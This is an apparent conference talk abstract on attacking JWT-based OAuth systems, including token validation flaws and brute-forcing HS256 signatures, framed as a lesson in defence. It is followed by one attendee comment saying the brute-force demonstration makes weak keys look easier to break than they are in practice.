So you’ve finally secured your APIs. And it uses JWT because everyone else does. But is it secure? JWTs are the new great thing that everyone is talking about, but you need to use them correctly. During this talk, we will see how we can use various attacks to hack into OAuth systems that use JWTs as a token mechanism. From token validation to brute forcing HS256, by seeing the attackers’ point of view the attendees will learn how to better defend themselves and make more secure servers.

Comments

Comments are closed.

Eric Mann at 14:07 on 26 Aug 2019

My only concern would be the relative ease of the "brute force an HS256 signature" demonstration. It does show how a weak key can be broken, but in practice even "weak" keys are somewhat stronger and would require a more focused approach to brute forcing.